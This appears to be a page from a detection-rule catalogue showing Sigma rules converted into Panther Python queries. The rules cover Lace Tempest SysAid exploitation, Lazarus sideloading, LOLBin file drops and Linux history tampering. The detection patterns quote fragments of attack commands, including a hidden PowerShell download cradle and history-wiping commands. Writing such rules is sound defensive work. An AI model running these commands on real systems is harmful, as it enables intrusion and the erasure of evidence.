Panther

1,713 rules · Sigma detections in Panther syntax
The same Sigma detection corpus, machine-rendered into Panther query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 3,742 rules (.zip, 1.7 MB): every Panther query in this view, packaged to deploy.
Filter by technique (pick techniques from the ATT&CK matrix); rule counts per tactic:
Reconnaissance (12)
Resource Development (10)
Initial Access (10)
Execution (30)
Persistence (43)
Privilege Escalation (20)
Stealth (83)
Defense Impairment (32)
Credential Access (35)
Discovery (33)
Lateral Movement (16)
Collection (20)
Command and Control (24)
Exfiltration (10)
Impact (18)
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.

Detection rules

50 shown of 1,713
level: high · quality: Moderate · alert volume: High FP
Lace Tempest Cobalt Strike Download
Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d
panther query
def rule(event):
    if all(
        [
            "-nop -w hidden -c IEX ((new-object net.webclient).downloadstring("
            in event.deep_get("CommandLine", default=""),
            "/a')" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lace Tempest Cobalt Strike Download
id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d
status: test
description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
references:
    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(
            - /a')
    condition: selection
falsepositives:
    - Unlikely
level: high
level: high · quality: Moderate · alert volume: High FP
Lace Tempest File Indicators
Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: e94486ea-2650-4548-bf25-88cbd0bb32d7
panther query
def rule(event):
    if any(
        [
            any(
                [
                    event.deep_get("TargetFilename", default="").endswith(
                        ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles.war"
                    ),
                    event.deep_get("TargetFilename", default="").endswith(
                        ":\\Program Files\\SysAidServer\\tomcat\\webapps\\leave"
                    ),
                ]
            ),
            ":\\Program Files\\SysAidServer\\tomcat\\webapps\\user."
            in event.deep_get("TargetFilename", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lace Tempest File Indicators
id: e94486ea-2650-4548-bf25-88cbd0bb32d7
status: test
description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
references:
    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        - TargetFilename|endswith:
              - ':\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe'
              - ':\Program Files\SysAidServer\tomcat\webapps\usersfiles.war'
              - ':\Program Files\SysAidServer\tomcat\webapps\leave'
        - TargetFilename|contains: ':\Program Files\SysAidServer\tomcat\webapps\user.'
    condition: selection
falsepositives:
    - Unlikely
level: high
level: high · quality: Moderate · alert volume: High FP
Lace Tempest Malware Loader Execution
Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d
panther query
def rule(event):
    if any(
        [
            event.deep_get("Image", default="").endswith(
                ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe"
            ),
            "SHA256=B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D"
            in event.deep_get("Hashes", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lace Tempest Malware Loader Execution
id: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d
status: test
description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
references:
    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: ':\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe'
    selection_hash:
        Hashes|contains: 'SHA256=B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high
level: high · quality: Moderate · alert volume: High FP
Lace Tempest PowerShell Evidence Eraser
Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · id: b377ddab-502d-4519-9e8c-5590033d2d70
panther query
def rule(event):
    if all(
        [
            "cleanLL" in event.deep_get("ScriptBlockText", default=""),
            "usersfiles.war" in event.deep_get("ScriptBlockText", default=""),
            'Remove-Item -Path "$tomcat_dir' in event.deep_get("ScriptBlockText", default=""),
            "SysAidServer" in event.deep_get("ScriptBlockText", default=""),
            "sleep " in event.deep_get("ScriptBlockText", default=""),
            "while(1)" in event.deep_get("ScriptBlockText", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lace Tempest PowerShell Evidence Eraser
id: b377ddab-502d-4519-9e8c-5590033d2d70
status: test
description: |
    Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
references:
    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
    - attack.execution
    - attack.t1059.001
    - detection.emerging-threats
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'cleanLL'
            - 'usersfiles.war'
            - 'Remove-Item -Path "$tomcat_dir'
            - 'SysAidServer'
            - 'sleep '
            - 'while(1)'
    condition: selection
falsepositives:
    - Unlikely
level: high
level: high · quality: Moderate · alert volume: High FP
Lace Tempest PowerShell Launcher
Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · id: 37dc5463-f7e3-4f61-ad76-ba59cd02a651
panther query
def rule(event):
    if all(
        [
            "\\SysAidServer\\tomcat\\webapps" in event.deep_get("ScriptBlockText", default=""),
            "Starting user.exe" in event.deep_get("ScriptBlockText", default=""),
            "\\usersfiles\\user.exe" in event.deep_get("ScriptBlockText", default=""),
            'Remove-Item -Force "$wapps' in event.deep_get("ScriptBlockText", default=""),
            "(Sophos)." in event.deep_get("ScriptBlockText", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lace Tempest PowerShell Launcher
id: 37dc5463-f7e3-4f61-ad76-ba59cd02a651
status: test
description: |
    Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
references:
    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-09
tags:
    - attack.execution
    - attack.t1059.001
    - detection.emerging-threats
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - '\SysAidServer\tomcat\webapps'
            - 'Starting user.exe'
            - '\usersfiles\user.exe'
            - 'Remove-Item -Force "$wapps'
            - '(Sophos).'
    condition: selection
falsepositives:
    - Unlikely
level: high
level: high · quality: Strong · alert volume: Medium FP
Lazarus APT DLL Sideloading Activity
Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
status: test · author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · id: 24007168-a26b-4049-90d0-ce138e13a5cf
panther query
def rule(event):
    if any(
        [
            all(
                [
                    event.deep_get("Image", default="")
                    == "C:\\ProgramShared\\PresentationHost.exe",
                    event.deep_get("ImageLoaded", default="") == ":\\ProgramShared\\mscoree.dll",
                ]
            ),
            all(
                [
                    event.deep_get("Image", default="") == "C:\\ProgramData\\Adobe\\colorcpl.exe",
                    event.deep_get("ImageLoaded", default="")
                    == "C:\\ProgramData\\Adobe\\colorui.dll",
                ]
            ),
            all(
                [
                    event.deep_get("Image", default="")
                    == "C:\\ProgramData\\Oracle\\Java\\fixmapi.exe",
                    event.deep_get("ImageLoaded", default="")
                    == "C:\\ProgramData\\Oracle\\Java\\mapistub.dll",
                ]
            ),
            all(
                [
                    event.deep_get("Image", default="")
                    == "C:\\ProgramData\\Adobe\\ARM\\tabcal.exe",
                    event.deep_get("ImageLoaded", default="")
                    == "C:\\ProgramData\\Adobe\\ARM\\HID.dll",
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lazarus APT DLL Sideloading Activity
id: 24007168-a26b-4049-90d0-ce138e13a5cf
status: test
description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
references:
    - https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/
    - https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/
author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-18
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
    - attack.g0032
    - detection.emerging-threats
logsource:
    product: windows
    category: image_load
detection:
    selection_mscoree:
        Image: 'C:\ProgramShared\PresentationHost.exe'
        ImageLoaded: ':\ProgramShared\mscoree.dll'
    selection_colorui:
        Image: 'C:\ProgramData\Adobe\colorcpl.exe'
        ImageLoaded: 'C:\ProgramData\Adobe\colorui.dll'
    selection_mapistub:
        Image: 'C:\ProgramData\Oracle\Java\fixmapi.exe'
        ImageLoaded: 'C:\ProgramData\Oracle\Java\mapistub.dll'
    selection_hid:
        Image: 'C:\ProgramData\Adobe\ARM\tabcal.exe'
        ImageLoaded: 'C:\ProgramData\Adobe\ARM\HID.dll'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high
level: high · quality: Moderate · alert volume: Medium FP
Lazarus System Binary Masquerading
Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
status: test · author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1) · ATT&CK mapping: sub-technique · id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\msdtc.exe"),
                    event.deep_get("Image", default="").endswith("\\gpsvc.exe"),
                ]
            ),
            not any(
                [
                    event.deep_get("Image", default="").startswith("C:\\Windows\\System32\\"),
                    event.deep_get("Image", default="").startswith("C:\\Windows\\SysWOW64\\"),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lazarus System Binary Masquerading
id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b
status: test
description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
references:
    - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)
date: 2020-06-03
modified: 2023-03-10
tags:
    - attack.stealth
    - attack.t1036.005
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\msdtc.exe'
            - '\gpsvc.exe'
    filter:
        Image|startswith:
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
    condition: selection and not filter
falsepositives:
    - Unlikely
level: high
level: high · quality: Moderate · alert volume: Medium FP
Legitimate Application Dropped Archive
Detects programs on a Windows system that should not write an archive to disk
status: test · author: frack113, Florian Roth · ATT&CK mapping: technique · id: 654fcc6d-840d-4844-9b07-2c3300e54a26
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\winword.exe"),
                    event.deep_get("Image", default="").endswith("\\excel.exe"),
                    event.deep_get("Image", default="").endswith("\\powerpnt.exe"),
                    event.deep_get("Image", default="").endswith("\\msaccess.exe"),
                    event.deep_get("Image", default="").endswith("\\mspub.exe"),
                    event.deep_get("Image", default="").endswith("\\eqnedt32.exe"),
                    event.deep_get("Image", default="").endswith("\\visio.exe"),
                    event.deep_get("Image", default="").endswith("\\wordpad.exe"),
                    event.deep_get("Image", default="").endswith("\\wordview.exe"),
                    event.deep_get("Image", default="").endswith("\\certutil.exe"),
                    event.deep_get("Image", default="").endswith("\\certoc.exe"),
                    event.deep_get("Image", default="").endswith("\\CertReq.exe"),
                    event.deep_get("Image", default="").endswith("\\Desktopimgdownldr.exe"),
                    event.deep_get("Image", default="").endswith("\\esentutl.exe"),
                    event.deep_get("Image", default="").endswith("\\finger.exe"),
                    event.deep_get("Image", default="").endswith("\\notepad.exe"),
                    event.deep_get("Image", default="").endswith("\\AcroRd32.exe"),
                    event.deep_get("Image", default="").endswith("\\RdrCEF.exe"),
                    event.deep_get("Image", default="").endswith("\\mshta.exe"),
                    event.deep_get("Image", default="").endswith("\\hh.exe"),
                ]
            ),
            any(
                [
                    event.deep_get("TargetFilename", default="").endswith(".zip"),
                    event.deep_get("TargetFilename", default="").endswith(".rar"),
                    event.deep_get("TargetFilename", default="").endswith(".7z"),
                    event.deep_get("TargetFilename", default="").endswith(".diagcab"),
                    event.deep_get("TargetFilename", default="").endswith(".appx"),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Legitimate Application Dropped Archive
id: 654fcc6d-840d-4844-9b07-2c3300e54a26
status: test
description: Detects programs on a Windows system that should not write an archive to disk
references:
    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth
date: 2022-08-21
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith:
            # Microsoft Office Programs Dropping Executables
            - \winword.exe
            - \excel.exe
            - \powerpnt.exe
            - \msaccess.exe
            - \mspub.exe
            - \eqnedt32.exe
            - \visio.exe
            - \wordpad.exe
            - \wordview.exe
            # LOLBINs that can be used to download executables
            - \certutil.exe
            - \certoc.exe
            - \CertReq.exe
            # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
            - \Desktopimgdownldr.exe
            - \esentutl.exe
            # - \expand.exe
            - \finger.exe
            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
            - \notepad.exe
            - \AcroRd32.exe
            - \RdrCEF.exe
            - \mshta.exe
            - \hh.exe
        TargetFilename|endswith:
            - '.zip'
            - '.rar'
            - '.7z'
            - '.diagcab'
            - '.appx'
    condition: selection
falsepositives:
    - Unknown
level: high
level: high · quality: Moderate · alert volume: Medium FP
Legitimate Application Dropped Executable
Detects programs on a Windows system that should not write executables to disk
status: test · author: frack113, Florian Roth (Nextron Systems) · ATT&CK mapping: technique · id: f0540f7e-2db3-4432-b9e0-3965486744bc
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\eqnedt32.exe"),
                    event.deep_get("Image", default="").endswith("\\wordpad.exe"),
                    event.deep_get("Image", default="").endswith("\\wordview.exe"),
                    event.deep_get("Image", default="").endswith("\\certutil.exe"),
                    event.deep_get("Image", default="").endswith("\\certoc.exe"),
                    event.deep_get("Image", default="").endswith("\\CertReq.exe"),
                    event.deep_get("Image", default="").endswith("\\Desktopimgdownldr.exe"),
                    event.deep_get("Image", default="").endswith("\\esentutl.exe"),
                    event.deep_get("Image", default="").endswith("\\mshta.exe"),
                    event.deep_get("Image", default="").endswith("\\AcroRd32.exe"),
                    event.deep_get("Image", default="").endswith("\\RdrCEF.exe"),
                    event.deep_get("Image", default="").endswith("\\hh.exe"),
                    event.deep_get("Image", default="").endswith("\\finger.exe"),
                ]
            ),
            any(
                [
                    event.deep_get("TargetFilename", default="").endswith(".exe"),
                    event.deep_get("TargetFilename", default="").endswith(".dll"),
                    event.deep_get("TargetFilename", default="").endswith(".ocx"),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Legitimate Application Dropped Executable
id: f0540f7e-2db3-4432-b9e0-3965486744bc
status: test
description: Detects programs on a Windows system that should not write executables to disk
references:
    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth (Nextron Systems)
date: 2022-08-21
modified: 2023-06-22
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith:
            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
            - '\eqnedt32.exe'
            - '\wordpad.exe'
            - '\wordview.exe'
            # LOLBINs that can be used to download executables
            - '\certutil.exe'
            - '\certoc.exe'
            - '\CertReq.exe'
            # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
            - '\Desktopimgdownldr.exe'
            - '\esentutl.exe'
            # - \expand.exe
            - '\mshta.exe'
            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
            - '\AcroRd32.exe'
            - '\RdrCEF.exe'
            - '\hh.exe'
            - '\finger.exe'
        TargetFilename|endswith:
            - '.exe'
            - '.dll'
            - '.ocx'
    condition: selection
falsepositives:
    - Unknown
level: high
level: high · quality: Moderate · alert volume: Medium FP
Legitimate Application Dropped Script
Detects programs on a Windows system that should not write scripts to disk
status: test · author: frack113, Florian Roth (Nextron Systems) · ATT&CK mapping: technique · id: 7d604714-e071-49ff-8726-edeb95a70679
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\eqnedt32.exe"),
                    event.deep_get("Image", default="").endswith("\\wordpad.exe"),
                    event.deep_get("Image", default="").endswith("\\wordview.exe"),
                    event.deep_get("Image", default="").endswith("\\certutil.exe"),
                    event.deep_get("Image", default="").endswith("\\certoc.exe"),
                    event.deep_get("Image", default="").endswith("\\CertReq.exe"),
                    event.deep_get("Image", default="").endswith("\\Desktopimgdownldr.exe"),
                    event.deep_get("Image", default="").endswith("\\esentutl.exe"),
                    event.deep_get("Image", default="").endswith("\\mshta.exe"),
                    event.deep_get("Image", default="").endswith("\\AcroRd32.exe"),
                    event.deep_get("Image", default="").endswith("\\RdrCEF.exe"),
                    event.deep_get("Image", default="").endswith("\\hh.exe"),
                    event.deep_get("Image", default="").endswith("\\finger.exe"),
                ]
            ),
            any(
                [
                    event.deep_get("TargetFilename", default="").endswith(".ps1"),
                    event.deep_get("TargetFilename", default="").endswith(".bat"),
                    event.deep_get("TargetFilename", default="").endswith(".vbs"),
                    event.deep_get("TargetFilename", default="").endswith(".scf"),
                    event.deep_get("TargetFilename", default="").endswith(".wsf"),
                    event.deep_get("TargetFilename", default="").endswith(".wsh"),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Legitimate Application Dropped Script
id: 7d604714-e071-49ff-8726-edeb95a70679
status: test
description: Detects programs on a Windows system that should not write scripts to disk
references:
    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth (Nextron Systems)
date: 2022-08-21
modified: 2023-06-22
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith:
            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
            - \eqnedt32.exe
            - \wordpad.exe
            - \wordview.exe
            # LOLBINs that can be used to download executables
            - \certutil.exe
            - \certoc.exe
            - \CertReq.exe
            # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
            - \Desktopimgdownldr.exe
            - \esentutl.exe
            # - \expand.exe
            - '\mshta.exe'
            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
            - '\AcroRd32.exe'
            - '\RdrCEF.exe'
            - '\hh.exe'
            - '\finger.exe'
        TargetFilename|endswith:
            - '.ps1'
            - '.bat'
            - '.vbs'
            - '.scf'
            - '.wsf'
            - '.wsh'
    condition: selection
falsepositives:
    - Unknown
level: high
level: high · quality: Moderate · alert volume: High FP
Legitimate Application Writing Files In Uncommon Location
Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution. Adversaries may leverage legitimate applications (Living off the Land Binaries - LOLBins) to drop or download malicious files to uncommon locations on the system to evade detection by security solutions.
status: experimental · author: Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: technique · id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\eqnedt32.exe"),
                    event.deep_get("Image", default="").endswith("\\wordpad.exe"),
                    event.deep_get("Image", default="").endswith("\\wordview.exe"),
                    event.deep_get("Image", default="").endswith("\\cmdl32.exe"),
                    event.deep_get("Image", default="").endswith("\\certutil.exe"),
                    event.deep_get("Image", default="").endswith("\\certoc.exe"),
                    event.deep_get("Image", default="").endswith("\\CertReq.exe"),
                    event.deep_get("Image", default="").endswith("\\bitsadmin.exe"),
                    event.deep_get("Image", default="").endswith("\\Desktopimgdownldr.exe"),
                    event.deep_get("Image", default="").endswith("\\esentutl.exe"),
                    event.deep_get("Image", default="").endswith("\\expand.exe"),
                    event.deep_get("Image", default="").endswith("\\extrac32.exe"),
                    event.deep_get("Image", default="").endswith("\\replace.exe"),
                    event.deep_get("Image", default="").endswith("\\mshta.exe"),
                    event.deep_get("Image", default="").endswith("\\ftp.exe"),
                    event.deep_get("Image", default="").endswith("\\Ldifde.exe"),
                    event.deep_get("Image", default="").endswith("\\RdrCEF.exe"),
                    event.deep_get("Image", default="").endswith("\\hh.exe"),
                    event.deep_get("Image", default="").endswith("\\finger.exe"),
                    event.deep_get("Image", default="").endswith("\\findstr.exe"),
                ]
            ),
            any(
                [
                    ":\\Perflogs" in event.deep_get("TargetFilename", default=""),
                    ":\\ProgramData\\" in event.deep_get("TargetFilename", default=""),
                    ":\\Temp\\" in event.deep_get("TargetFilename", default=""),
                    ":\\Users\\Public\\" in event.deep_get("TargetFilename", default=""),
                    ":\\Windows\\" in event.deep_get("TargetFilename", default=""),
                    "\\$Recycle.Bin\\" in event.deep_get("TargetFilename", default=""),
                    "\\AppData\\Local\\" in event.deep_get("TargetFilename", default=""),
                    "\\AppData\\Roaming\\" in event.deep_get("TargetFilename", default=""),
                    "\\Contacts\\" in event.deep_get("TargetFilename", default=""),
                    "\\Desktop\\" in event.deep_get("TargetFilename", default=""),
                    "\\Favorites\\" in event.deep_get("TargetFilename", default=""),
                    "\\Favourites\\" in event.deep_get("TargetFilename", default=""),
                    "\\inetpub\\wwwroot\\" in event.deep_get("TargetFilename", default=""),
                    "\\Music\\" in event.deep_get("TargetFilename", default=""),
                    "\\Pictures\\" in event.deep_get("TargetFilename", default=""),
                    "\\Start Menu\\Programs\\Startup\\"
                    in event.deep_get("TargetFilename", default=""),
                    "\\Users\\Default\\" in event.deep_get("TargetFilename", default=""),
                    "\\Videos\\" in event.deep_get("TargetFilename", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Legitimate Application Writing Files In Uncommon Location
id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67
related:
    - id: 2ddef153-167b-4e89-86b6-757a9e65dcac # bitsadmin dedicated rule
      type: similar
status: experimental
description: |
    Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution.
    Adversaries may leverage legitimate applications (Living off the Land Binaries - LOLBins) to drop or download malicious files to uncommon locations on the system to evade detection by security solutions.
references:
    - https://lolbas-project.github.io/#/download
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-12-10
tags:
    - attack.stealth
    - attack.t1218
    - attack.command-and-control
    - attack.t1105
logsource:
    product: windows
    category: file_event
detection:
    selection_img:
        Image|endswith:
            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
            - '\eqnedt32.exe'
            - '\wordpad.exe'
            - '\wordview.exe'
            # LOLBINs that can be used to download executables
            - '\cmdl32.exe'
            - '\certutil.exe'
            - '\certoc.exe'
            - '\CertReq.exe'
            - '\bitsadmin.exe'
            - '\Desktopimgdownldr.exe'
            - '\esentutl.exe'
            - '\expand.exe'
            - '\extrac32.exe'
            - '\replace.exe'
            - '\mshta.exe'
            - '\ftp.exe'
            - '\Ldifde.exe'
            - '\RdrCEF.exe'
            - '\hh.exe'
            - '\finger.exe'
            - '\findstr.exe'
    selection_locations:
        TargetFilename|contains:
            - ':\Perflogs'
            - ':\ProgramData\'
            - ':\Temp\'
            - ':\Users\Public\'
            - ':\Windows\'
            - '\$Recycle.Bin\'
            - '\AppData\Local\'
            - '\AppData\Roaming\'
            - '\Contacts\'
            - '\Desktop\'
            - '\Favorites\'
            - '\Favourites\'
            - '\inetpub\wwwroot\'
            - '\Music\'
            - '\Pictures\'
            - '\Start Menu\Programs\Startup\'
            - '\Users\Default\'
            - '\Videos\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/info.yml
level: high · quality: Moderate · alert volume: High FP
Linux Command History Tampering
Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
status: test · author: Patrick Bareiss · ATT&CK mapping: sub-technique · id: fdc88d25-96fb-4b7c-9633-c0e417fdbd4e
panther query
import re


# Sigma keywords; '*' is a Sigma wildcard for any run of characters and
# must be translated, not matched as a literal asterisk.
KEYWORDS = [
    "cat /dev/null >*sh_history",
    "cat /dev/zero >*sh_history",
    "chattr +i*sh_history",
    'echo "" >*sh_history',
    "empty_bash_history",
    "export HISTFILESIZE=0",
    "history -c",
    "history -w",
    "ln -sf /dev/null *sh_history",
    "ln -sf /dev/zero *sh_history",
    "rm *sh_history",
    "shopt -ou history",
    "shopt -uo history",
    "shred *sh_history",
    "truncate -s0 *sh_history",
]


def _keyword_regex(keyword):
    # Sigma keyword matching is a case-insensitive substring match; only '*' is special.
    return re.compile(".*".join(re.escape(part) for part in keyword.split("*")), re.IGNORECASE)


PATTERNS = [_keyword_regex(keyword) for keyword in KEYWORDS]


def _string_values(obj):
    # Walk the event and yield every string value, so keywords are matched against
    # raw field contents rather than a JSON dump, which would escape the quotes in
    # 'echo "" >*sh_history' and never match.
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from _string_values(value)
    elif isinstance(obj, (list, tuple)):
        for value in obj:
            yield from _string_values(value)


def rule(event):
    return any(p.search(v) for v in _string_values(event.to_dict()) for p in PATTERNS)
view Sigma YAML
title: Linux Command History Tampering
id: fdc88d25-96fb-4b7c-9633-c0e417fdbd4e
status: test
description: |
    Detects commands that try to clear or tamper with the Linux command history.
    This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md
    - https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics
    - https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/
author: Patrick Bareiss
date: 2019-03-24
modified: 2024-04-17
tags:
    - attack.stealth
    - attack.t1070.003
logsource:
    product: linux
detection:
    keywords:
        - 'cat /dev/null >*sh_history'
        - 'cat /dev/zero >*sh_history'
        - 'chattr +i*sh_history'
        - 'echo "" >*sh_history'
        - 'empty_bash_history'
        - 'export HISTFILESIZE=0'
        - 'history -c'
        - 'history -w'
        - 'ln -sf /dev/null *sh_history'
        - 'ln -sf /dev/zero *sh_history'
        - 'rm *sh_history'
        - 'shopt -ou history'
        - 'shopt -uo history'
        - 'shred *sh_history'
        - 'truncate -s0 *sh_history'
        # - 'unset HISTFILE'  # prone to false positives
    condition: keywords
